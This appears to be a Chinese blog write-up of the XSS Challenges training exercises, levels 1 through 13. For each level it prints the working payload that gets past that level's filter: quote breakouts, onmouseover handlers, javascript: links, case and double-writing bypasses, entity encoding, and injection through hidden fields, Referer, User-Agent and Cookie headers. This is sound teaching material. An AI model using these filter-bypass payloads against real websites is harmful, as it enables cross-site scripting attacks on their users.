当前位置: 首页 > news >正文

XSS入门 XSS Challenges

level1(直接注入)

<script>alert('xss')</script>

image-20230825114847371

在这里插入图片描述

level2(双引号闭合标签)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述
在这里插入图片描述

发现<>"被转换,构造新的语句
"><script>alert(/xss/)</script>

在这里插入图片描述

level3(单引号闭合标签+html事件)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

在这里插入图片描述

存在单引号,增加新的事件,构造新的语句:
'onmouseover='alert(/xss/)'

在这里插入图片描述

level4(双引号闭合标签+html事件)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述
在这里插入图片描述

只有双引号,没有被转换,构造新的语句:
"onmouseover='alert(/xss/)'

在这里插入图片描述

level5(双引号闭合标签+伪协议)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

对ScRiPt和on有过滤,不能使用事件,可以使用a标签
"><a href="javascript:alert(/xss/)">click me</a>

在这里插入图片描述

level6(大小写转换)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

尝试过后,修改语句:
"><a hRef="javascript:alert(/xss/)">click me</a>

在这里插入图片描述

level7(双写)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

双写;修改语句:
"><scrscriptipt>alert(/xss/)</scrscriptipt>

在这里插入图片描述

level8(编码)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

可以看出大小写,双引号,也过滤了,前面关,用过的也都不起作用。
看到有个a标签,我们可以考虑伪协议 + 字符编码。
payload:javascript:alert(/xss/)

在这里插入图片描述

对r、i进行编码:
javasc&#x72;&#x69;pt:alert(/xss/)

在这里插入图片描述

level9(http://)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

javasc&#x72;&#x69;pt:alert('xsshttp://')

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

level10(type=“text”)

测试
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

在这里插入图片描述

其类型为hidden,则需要重新上传,type="text",通过尝试,t_sort能够在页面显示
t_link
t_history
t_sort
t_sort=1" type="text"

在这里插入图片描述

"onmouseover='alert(/xss/)' type="text"

在这里插入图片描述

level11(referer)

查看页面代码和源码,发现可以通过referer注入命令

在这里插入图片描述

在这里插入图片描述

hackbar获取url,选择referer注入
click me!" type="button" onclick="alert(/xss/)

在这里插入图片描述

在这里插入图片描述

level12(user-agent)

查看页面代码和源码,发现可以通过user-agent注入命令

在这里插入图片描述

在这里插入图片描述

hackbar获取url,选择user-agent注入
click me!" type="button" onclick="alert(/xss/)

在这里插入图片描述

在这里插入图片描述

level13(cookie)

查看页面代码和源码,发现可以通过cookie注入命令

在这里插入图片描述

在这里插入图片描述

hackbar获取url,选择cookie注入
user=click me!" type="button" onclick="alert(/xss/)

在这里插入图片描述

在这里插入图片描述

http://www.lryc.cn/news/164763.html

相关文章:

  • 李沐《动手学深度学习》torch.cat() 和 torch.stack()的区别及思考
  • 【算法与数据结构】235、LeetCode二叉搜索树的最近公共祖先
  • bboss 流批一体化框架 与 数据采集 ETL
  • JVM详细教程
  • Smartbi吴华夫:后疫情时代,BI发展趋势的观察与应对
  • 软件设计模式系列之三———工厂方法模式
  • pytorch 多卡分布式训练 调用all_gather_object 出现阻塞等待死锁的问题
  • SpringMvc增删改查
  • 【计算机网络】网络编程接口 Socket API 解读(5)
  • 手动实现一个bind函数!
  • 数据结构-时间复杂度/空间复杂度
  • 英语写作中“展示”、“表明”demonstrate、show、indicate、illustrate的用法
  • Redis的java客户端
  • Android环境配置笔记
  • element-table 行的拖拽更改顺序(无需下载sortableJs
  • Docker部署jenkins
  • 从0到1学会Git(第三部分):Git的远程仓库链接与操作
  • 虚拟机Ubuntu操作系统常用终端命令(1)(详细解释+详细演示)
  • redis实战-redis实现异步秒杀优化
  • Python爬虫-IP隐藏技术与代理爬取
  • 二刷力扣--链表
  • 返回值加const ,为了不拷贝得到成员的值,但被赋值的左值也要const
  • 本地如何使用HTTPS进行调试
  • 观察者模式:对象之间的订阅机制
  • 【1462. 课程表 IV】
  • Kerberos 身份验证
  • R语言贝叶斯METROPOLIS-HASTINGS GIBBS 吉布斯采样器估计变点指数分布分析泊松过程车站等待时间...
  • 通付盾入选2023年度“上市苗圃工程”重点企业
  • SpringMVC之文件上传下载
  • 嵌入式IDE(2):KEIL中SCF分散加载链接文件详解和实例分析